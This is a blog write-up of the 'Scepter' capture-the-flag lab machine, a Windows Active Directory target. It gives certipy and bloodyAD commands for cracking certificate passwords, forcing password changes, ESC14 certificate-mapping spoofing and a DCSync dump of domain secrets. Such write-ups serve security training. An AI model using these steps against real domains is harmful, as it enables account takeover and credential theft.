<!DOCTYPE html>
<html class="direction--ltr"lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Scepter-Windows-Hard | Pwn3d777</title>
<meta name="generator" content="Jekyll v3.10.0" />
<meta property="og:title" content="Scepter-Windows-Hard" />
<meta name="author" content="GitHub User" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Scepter" />
<meta property="og:description" content="Scepter" />
<link rel="canonical" href="https://your-site-url/writeups/2025/07/22/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9.html" />
<meta property="og:url" content="https://your-site-url/writeups/2025/07/22/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9.html" />
<meta property="og:site_name" content="Pwn3d777" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-07-22T16:06:57+00:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Scepter-Windows-Hard" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"GitHub User"},"dateModified":"2025-07-22T16:06:57+00:00","datePublished":"2025-07-22T16:06:57+00:00","description":"Scepter","headline":"Scepter-Windows-Hard","mainEntityOfPage":{"@type":"WebPage","@id":"https://your-site-url/writeups/2025/07/22/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9.html"},"url":"https://your-site-url/writeups/2025/07/22/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css">
  <link rel="icon" type="image/png" href="/assets/favicon.png" />
  <link rel="stylesheet" href="/assets/css/magnific-popup.css"><link type="application/atom+xml" rel="alternate" href="https://your-site-url/feed.xml" title="Pwn3d777" /><script src="https://code.jquery.com/jquery-3.2.0.min.js"></script> 
  <script src="/assets/js/jquery.magnific-popup.js"></script>
</head>
<body><div class="site-header">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/">Pwn3d777<b class="command_prompt"></b><b class="blinking_cursor">_</b></a>
    <span class="social_links">
        
        
        <a class="color-cyan-hover" href="https://twitter.com/bitbrain_"><i class="fab fa-twitter-square"></i></a>
        
        
        
        <a class="color-red-hover" href="https://bitbrain.itch.io"><i class="fab fa-itch-io"></i></a>
        
        
        
        <a class="color-purple-hover" href="https://github.com/bitbrain"><i class="fab fa-github-square"></i></a>
        
        
    </span>
  </div>
</div>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        
<div class="post">
  <h1 class="post-title">Scepter-Windows-Hard</h1>
  
  <div class="post-date">
    Published on 22 Jul 2025
    
  </div>
  
  <h1 id="scepter">Scepter</h1>

<h1 id="1-enumeration">1. Enumeration<br /><br /></h1>

<p>Start by enumerating open ports, since this is a Windows machine, several Microsoft Network services running on it
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image.png" alt="image.png" />
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_1.png" alt="image.png" />
<br /><br />
Port 2049/tcp is particularly interesting, nmap identifies it as nlockmgr (Network Lock Manager), a protocol that cooperates with Network File System (NFS) to prevent issues caused by simultaneous writing
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_2.png" alt="image.png" />
<br /><br />
Enumerate the current mount points in this host
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_3.png" alt="image.png" />
<br /><br />
<code class="language-plaintext highlighter-rouge">-a active mounts</code></p>

<p><code class="language-plaintext highlighter-rouge">-e available exports</code>
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_4.png" alt="image.png" />
<br /><br /></p>
<h1 id="2-user-flag">2. User flag</h1>
<p><br /><br />
Download available files from the mount
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_5.png" alt="image.png" />
<br /><br />
We have three .pfx files that we could try to crack in order to retrieve their pfx passwords and  generate new unprotected pfx files for domain authentication, but this will not work because those credentials have been revoked. Instead we could use one of these file to generate a hash to discover that a password was reused several times across all .pfx file. Then we can proceed to work with baker user, since we own needed files to create our own .pfx file and the password used for him is the same used for other users.
<br /><br />
Another approach is using <code class="language-plaintext highlighter-rouge">pem2john</code> tool with the <code class="language-plaintext highlighter-rouge">baker.key</code> file
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_6.png" alt="image.png" />
<br /><br />
To carry out the previously mentioned actions, start using <code class="language-plaintext highlighter-rouge">pfx2john</code> to generate a hash
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_7.png" alt="image.png" />
<br /><br />
Upon inspecting that hash, we found that the generated type was <code class="language-plaintext highlighter-rouge">pfxng</code>
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_8.png" alt="image.png" />
<br /><br />
You might encounter issues when cracking this hash because this format is not supported in some versions of john (at least not supported by the version included with kali), you can install a different version if you want,  although this could generate issues and might be problematic for your environment
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_9.png" alt="image.png" />
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_10.png" alt="image.png" />
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_11.png" alt="image.png" />
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_12.png" alt="image.png" />
<br /><br />
  The recommended tool to address this scenario is <code class="language-plaintext highlighter-rouge">crackpkcs12</code> that cracks <code class="language-plaintext highlighter-rouge">p12</code> and <code class="language-plaintext highlighter-rouge">pfx</code> files
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_99591778_a1d7_4d1d_a2aa_1fbff0d78c0a.png" alt="image.png" />
<br /><br />
Once the password is found, we can obtain a <code class="language-plaintext highlighter-rouge">pxf</code> file in name of <code class="language-plaintext highlighter-rouge">baker</code>
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_13.png" alt="image.png" />
<br /><br />
Use that file to request a tgt using auth module in certipy
<br /><br /></p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">certipy</span> <span class="n">auth</span> <span class="o">-</span><span class="n">pfx</span> <span class="p">.</span><span class="n">pfx</span>
</code></pre></div></div>
<p><br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_14.png" alt="image.png" />
<br /><br />
Set <code class="language-plaintext highlighter-rouge">/etc/resolv.conf</code> to avoid potential DNS problems while running the bloodhound collector
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_15.png" alt="image.png" />
<br /><br /></p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">bloodhound</span><span class="o">-</span><span class="n">python</span> <span class="o">-</span><span class="n">u</span> <span class="n">d</span><span class="p">.</span><span class="n">baker</span> <span class="o">--</span><span class="n">hashes</span> <span class="p">:</span><span class="nb">hash</span> <span class="o">-</span><span class="n">ns</span> <span class="n">dns</span> <span class="o">-</span><span class="n">d</span> <span class="n">domain</span> <span class="o">-</span><span class="n">c</span> <span class="n">ALL</span>
</code></pre></div></div>
<p><br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_16.png" alt="image.png" />
<br /><br />
Checking the information displayed by Bloodhound we discovered that <code class="language-plaintext highlighter-rouge">p.adams</code> has <code class="language-plaintext highlighter-rouge">DCSync</code> privileges. Additionally, the account operators group has <code class="language-plaintext highlighter-rouge">generic all</code> privileges over him, and he is also associated with a  <code class="language-plaintext highlighter-rouge">helpdesk enrrollment certificate</code> , for that reason, he will be our final target account in order to compromise administrator account
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_17.png" alt="image.png" />
<br /><br />
But for now we need to obtain the user flag first. Mark <code class="language-plaintext highlighter-rouge">d.baker</code> as owned, and identify the <code class="language-plaintext highlighter-rouge">ForceChangePassword</code> policy that he has over <code class="language-plaintext highlighter-rouge">a.carter</code>
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_18.png" alt="image.png" />
<br /><br />
Abuse this configuration using
<br /><br /></p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">bloodyAD</span> <span class="o">--</span><span class="n">host</span> <span class="n">dc01</span><span class="p">.</span><span class="n">domain</span><span class="p">.</span><span class="n">htb</span> <span class="o">-</span><span class="n">d</span> <span class="n">domain</span><span class="p">.</span><span class="n">htb</span> <span class="o">-</span><span class="n">u</span> <span class="n">atacker</span> <span class="o">-</span><span class="n">p</span> <span class="p">:</span><span class="nb">hash</span> <span class="nb">set</span> <span class="n">password</span> <span class="n">victim</span> <span class="n">newpassword</span>
</code></pre></div></div>
<p><br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_19.png" alt="image.png" />
<br /><br />
<code class="language-plaintext highlighter-rouge">A.carter</code> is member of <code class="language-plaintext highlighter-rouge">IT support</code> group which holds <code class="language-plaintext highlighter-rouge">GenericAll</code> privileges over the <code class="language-plaintext highlighter-rouge">staff access certificate</code>
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_20.png" alt="image.png" />
<br /><br />
It is curious that this template contains <code class="language-plaintext highlighter-rouge">d.baker</code> ; this might be vulnerable to some <code class="language-plaintext highlighter-rouge">ESC</code> technique due to a clear misconfiguration
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_21.png" alt="image.png" />
<br /><br />
Let’s go through this step by step. First, let’s try to obtain all possible privileges over the users the have owned
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_22.png" alt="image.png" />
<br /><br />
Find <code class="language-plaintext highlighter-rouge">ESC</code> type vulnerabilities using <code class="language-plaintext highlighter-rouge">certipy</code> tool
<br /><br /></p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">certipy</span> <span class="n">find</span> <span class="o">-</span><span class="n">u</span> <span class="n">d</span><span class="p">.</span><span class="n">baker</span> <span class="o">-</span><span class="n">p</span> <span class="s">'hash'</span> <span class="o">-</span><span class="n">dc</span><span class="o">-</span><span class="n">ip</span> <span class="n">ip</span>
</code></pre></div></div>
<p><br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_23.png" alt="image.png" />
<br /><br />
It says that d.baker might be vulnerable to <code class="language-plaintext highlighter-rouge">ESC9</code> but to perform this attack we need to be able to include the <code class="language-plaintext highlighter-rouge">UPN</code> in the <code class="language-plaintext highlighter-rouge">SAN</code> of the target user, and this configuration is not present, we only can include email in the <code class="language-plaintext highlighter-rouge">SAN</code> . Even so, now we are aware that this certification template has no security extension flag. We can also notice that this certificate template has <code class="language-plaintext highlighter-rouge">SubjectAltRequireEmail</code> set as a valid name option
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_24.png" alt="image.png" />
<br /><br />
Then, use the following command to discover that the <code class="language-plaintext highlighter-rouge">altSecurityIdentity</code> property is used to identify <code class="language-plaintext highlighter-rouge">hbrowm</code> user. 
<br /><br /></p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">netexec</span> <span class="n">ldap</span> <span class="n">scepter</span><span class="p">.</span><span class="n">htb</span> <span class="o">-</span><span class="n">u</span> <span class="n">d</span><span class="p">.</span><span class="n">baker</span> <span class="o">-</span><span class="n">H</span> <span class="mi">18</span><span class="n">b5fb0d99e7a475316213c15b6f22ce</span> <span class="o">--</span><span class="n">query</span> <span class="s">"(sAMAccountName=h.brown)"</span> <span class="s">""</span>
</code></pre></div></div>
<p><br /><br />
This property is related with ESC14 and we are going to see a lot of it on this machine
<br /><br />
You can see more information about it here:
<br /><br />
https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_25.png" alt="image.png" />
<br /><br />
With all the information gathered so far, we can perform an attack to escalate to h.brown user
<br /><br /></p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">bloodyAD</span> <span class="o">--</span><span class="n">host</span> <span class="n">dc01</span><span class="p">.</span><span class="n">domain</span><span class="p">.</span><span class="n">htb</span> <span class="o">-</span><span class="n">d</span> <span class="n">domain</span><span class="p">.</span><span class="n">htb</span> <span class="o">-</span><span class="n">u</span> <span class="n">a</span><span class="p">.</span><span class="n">carter</span> <span class="o">-</span><span class="n">p</span> <span class="s">'password'</span> <span class="nb">set</span> <span class="nb">object</span> <span class="s">'user-owned'</span> <span class="n">mail</span> <span class="o">-</span><span class="n">v</span> <span class="s">'target@mail.htb'</span>
<span class="n">certipy</span> <span class="n">req</span> <span class="o">-</span><span class="n">ca</span> <span class="n">CA</span> <span class="o">-</span><span class="n">u</span> <span class="s">'user-owned'</span> <span class="o">-</span><span class="n">hashes</span> <span class="p">:</span><span class="nb">hash</span> <span class="o">-</span><span class="n">template</span> <span class="n">vulnerabletemplate</span> <span class="o">-</span><span class="n">target</span> <span class="n">dc01</span><span class="p">.</span><span class="n">scepter</span><span class="p">.</span><span class="n">htb</span>
<span class="n">certipy</span> <span class="n">auth</span> <span class="o">-</span><span class="n">domain</span> <span class="n">domain</span><span class="p">.</span><span class="n">htb</span> <span class="o">-</span><span class="n">pfx</span> <span class="p">.</span><span class="n">pfx</span> <span class="o">-</span><span class="n">dc</span><span class="o">-</span><span class="n">ip</span> <span class="n">ip</span> <span class="o">-</span><span class="n">username</span> <span class="s">'target'</span>
</code></pre></div></div>
<p><br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_26.png" alt="image.png" />
<br /><br />
Set the <code class="language-plaintext highlighter-rouge">/etc/krb5.conf</code>
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_27.png" alt="image.png" />
<br /><br />
Use the obtained hash to get a TGT and get remote access as h.brown
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_7e673afa_a3cb_4d7e_a84e_f9e1afe1d10f.png" alt="image.png" />
<br /><br /></p>
<h1 id="3priv-esc">3.Priv esc</h1>
<p><br /><br />
Check write permissions for <code class="language-plaintext highlighter-rouge">h.brown</code> user
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_28.png" alt="image.png" />
<br /><br />
Write permissions in <code class="language-plaintext highlighter-rouge">altSecurityIdentities</code> property over <code class="language-plaintext highlighter-rouge">p.adams</code> open up another potential attack ESC14 vector mixed with the previous scenario exploited
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_29.png" alt="image.png" />
<br /><br />
Basically we are going to set an weak X509RFC822 explicit mapping in <code class="language-plaintext highlighter-rouge">altSecurityIdentities</code> using scenario A (Write permissions) to then perform the previous attack using scenario B
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_30.png" alt="image.png" />
<br /><br />
Use the following commands to spoof <code class="language-plaintext highlighter-rouge">p.adams</code> 
<br /><br /></p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#Set property in p.adams 
</span><span class="n">bloodyAD</span> <span class="o">--</span><span class="n">host</span> <span class="n">dc01</span><span class="p">.</span><span class="n">domain</span><span class="p">.</span><span class="n">htb</span> <span class="o">-</span><span class="n">d</span> <span class="n">domain</span><span class="p">.</span><span class="n">htb</span> <span class="o">-</span><span class="n">u</span> <span class="n">attacker1</span> <span class="o">-</span><span class="n">k</span> <span class="nb">set</span> <span class="nb">object</span> <span class="s">'victim'</span> <span class="n">altSecurityIdentities</span> <span class="o">-</span><span class="n">v</span> <span class="s">'x509:&lt;RFC822&gt;p.adams@scepter.htb'</span>
<span class="c1">#Make h.brown use p.adams email
</span><span class="n">bloodyAD</span> <span class="o">--</span><span class="n">host</span> <span class="n">dc01</span><span class="p">.</span><span class="n">domain</span><span class="p">.</span><span class="n">htb</span> <span class="o">-</span><span class="n">d</span> <span class="n">domain</span><span class="p">.</span><span class="n">htb</span> <span class="o">-</span><span class="n">u</span> <span class="n">attacker2</span> <span class="o">-</span><span class="n">p</span> <span class="s">'password'</span> <span class="nb">set</span> <span class="nb">object</span> <span class="s">'attacker1'</span> <span class="n">mail</span> <span class="o">-</span><span class="n">v</span> <span class="s">'target@domain.htb'</span>
</code></pre></div></div>
<p><br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_31.png" alt="image.png" />
<br /><br /></p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#Request a .pfx fila as p.adams using d.baker ticket
</span><span class="n">certipy</span> <span class="n">req</span> <span class="o">-</span><span class="n">ca</span> <span class="n">CA</span> <span class="o">-</span><span class="n">u</span> <span class="s">'user-owned'</span> <span class="o">-</span><span class="n">k</span> <span class="o">-</span><span class="n">template</span> <span class="n">vulnerabletemplate</span> <span class="o">-</span><span class="n">target</span> <span class="n">dc01</span><span class="p">.</span><span class="n">scepter</span><span class="p">.</span><span class="n">htb</span> <span class="o">-</span><span class="n">out</span> <span class="n">p</span><span class="p">.</span><span class="n">adams</span>
</code></pre></div></div>
<p><br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_32.png" alt="image.png" />
<br /><br /></p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#Authenticate and the nt hash for p.adams
</span><span class="n">certipy</span> <span class="n">auth</span> <span class="o">-</span><span class="n">domain</span> <span class="n">domain</span><span class="p">.</span><span class="n">htb</span> <span class="o">-</span><span class="n">pfx</span> <span class="p">.</span><span class="n">pfx</span> <span class="o">-</span><span class="n">dc</span><span class="o">-</span><span class="n">ip</span> <span class="n">ip</span> <span class="o">-</span><span class="n">username</span> <span class="s">'target'</span>
</code></pre></div></div>
<p><br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_33.png" alt="image.png" />
<br /><br />
As <code class="language-plaintext highlighter-rouge">p.adams</code> has DCSync privileges, proceed to dump secrets to then access as administrator
<br /><br />
<img src="/assets/images/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9_image_34.png" alt="image.png" />
<br /><br />
Machine pwned@@@##!
<script src="/assets/js/matrix-overlay.js"></script></p>
<link rel="stylesheet" href="/assets/css/imagesstyle.css" />


</div>


<div class="comments">
<div id="disqus_thread"></div>
<script>
 var disqus_config = function () {
     this.page.url = 'https://your-site-url/writeups/2025/07/22/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9.html';
     this.page.identifier = '/writeups/2025/07/22/d0bd1f30-699b-4cb4-8096-51966443e47d-export-f2fed7e5-8f3c-486d-8c98-5912154c70d9';
     this.page.title = 'Scepter-Windows-Hard';
 };

 (function() {  // REQUIRED CONFIGURATION VARIABLE: EDIT THE SHORTNAME BELOW
     var d = document, s = d.createElement('script');

     s.src = '//<your-disqus-shortname>.disqus.com/embed.js';

     s.setAttribute('data-timestamp', +new Date());
     (d.head || d.body).appendChild(s);
 })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>

</div>




<div class="related">
  <h2>related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/writeups/2025/08/04/d2fd2792-68e0-4168-9904-f90f3bf63609-export-0ee8c1a5-de29-43f8-b0f4-339fa55d28de.html">
            Code-Linux-Easy
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/writeups/2025/07/26/e76d8ea2-ffc7-429a-835f-9f3b0344d1ab-export-d6a1d454-c23f-4600-bcb8-77c5a1ed5947.html">
            Cypher-Linux-Medium
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/writeups/2025/07/20/605877c5-9868-4437-874b-258fe0b8d05d-export-d3087789-ca72-4924-b87a-29a7d4710b9f.html">
            Haze-Windows-Hard
          </a>
        </h3>
      </li>
    
  </ul>
</div>






<script>
  let i = 0;
  const text = '';
  const speed = parseInt('50');
  
  function typeWriter() {
    if (i < text.length) {
      document.getElementById('animated-post-description').innerHTML += text.charAt(i);
      i++;
      setTimeout(typeWriter, speed);
    }
  }

  document.getElementById('animated-post-description').style.display = 'initial';
  typeWriter();

  // Image modal
  var $imgs = [];
  $('img').each(function(idx) {
    var obj = {
      src: $(this).attr('src')
    }
    $imgs.push(obj);
    var elem = $(this);
    $(this).click(function() {
      $('.modal').magnificPopup('open', idx);
    });
  });

  $('.modal').magnificPopup({
    items: $imgs,
    type: 'image',
    closeOnContentClick: true,
    mainClass: 'mfp-img-mobile',
    image: {
      verticalFit: true
    }
    
  });
</script>

      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
    <div class="credits"><a href="https://github.com/bitbrain/jekyll-dash">dash</a> theme for Jekyll by <a href="https://github.com/bitbrain">bitbrain</a> made with <i class="fas fa-heart"></i><div class="toggleWrapper">
    <input type="checkbox" class="dn" id="theme-toggle" onclick="modeSwitcher()" checked />
    <label for="theme-toggle" class="toggle">
    <span class="toggle__handler">
      <span class="crater crater--1"></span>
      <span class="crater crater--2"></span>
      <span class="crater crater--3"></span>
    </span>
        <span class="star star--1"></span>
        <span class="star star--2"></span>
        <span class="star star--3"></span>
        <span class="star star--4"></span>
        <span class="star star--5"></span>
        <span class="star star--6"></span>
    </label>
</div>
<script type="text/javascript">
const theme = localStorage.getItem('theme');

if (theme === "light") {
    document.documentElement.setAttribute('data-theme', 'light');
} else {
    document.documentElement.setAttribute('data-theme', 'dark');
}
const userPrefers = getComputedStyle(document.documentElement).getPropertyValue('content');

function activateDarkTheme() {
    document.getElementById('theme-toggle').checked = true;
    document.documentElement.setAttribute('data-theme', 'dark');
    document.documentElement.classList.add('theme--dark');
    document.documentElement.classList.remove('theme--light');
	document.getElementById("theme-toggle").className = 'light';
	window.localStorage.setItem('theme', 'dark');
}

function activateLightTheme() {
    document.getElementById('theme-toggle').checked = false;
    document.documentElement.setAttribute('data-theme', 'light');
    document.documentElement.classList.add('theme--light');
    document.documentElement.classList.remove('theme--dark');
	document.getElementById("theme-toggle").className = 'dark';
	window.localStorage.setItem('theme', 'light');
}

if (theme === "dark") {
    activateDarkTheme();
} else if (theme === "light") {
    activateLightTheme();
} else if  (userPrefers === "light") {
    activateDarkTheme();
} else {
    activateDarkTheme();
}

function modeSwitcher() {
	let currentMode = document.documentElement.getAttribute('data-theme');
	if (currentMode === "dark") {
	    activateLightTheme();
	} else {
	    activateDarkTheme();
	}
}
</script></div>
  </div>
</footer>


<script>
      window.FontAwesomeConfig = {
        searchPseudoElements: true
      }
    </script>
  </body>

</html>
